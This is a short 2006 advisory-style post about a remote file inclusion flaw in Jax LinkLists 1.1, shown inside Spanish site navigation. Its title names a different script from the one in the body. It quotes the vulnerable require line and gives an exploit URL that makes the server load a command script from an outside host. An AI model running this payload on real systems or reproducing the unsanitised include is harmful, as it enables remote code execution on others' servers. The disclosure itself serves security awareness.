PHP Top webs (config.php) Remote File Inclue Vulnerability

Do, 15/10/2006 - 18:57 — OeX

# BiyoSecurity.Org & SecurityWall.Org

# Download : http://www.jtr.de/scripting/php/linklists/linklists%20v1.1.zip

# Script Name : Jax LinkLists

# Version : 1.1

# Risk : high

# Regard : RMx

# Thanx : Liz0zim , KorsaN , DreamLord , TR_IP

# Vulnerable Files :

/admin/linklists.admin.php

# Vulnerable code :

// global variables
require ( $pathtoscript."globals.inc.php");

# Exploit : 

http://www.victim.com/[PATH]/admin/linklists.admin.php?pathtoscript=http://site.com/cmd.gif?&cmd=ls

Appweb
Remote_File_Inclusion

520 lecturas

babilonics.com

Menu

PHP Top webs (config.php) Remote File Inclue Vulnerability

Comentarios

Enviar un comentario nuevo

Inicio de sesión

Most downloaded

Nuevos

En línea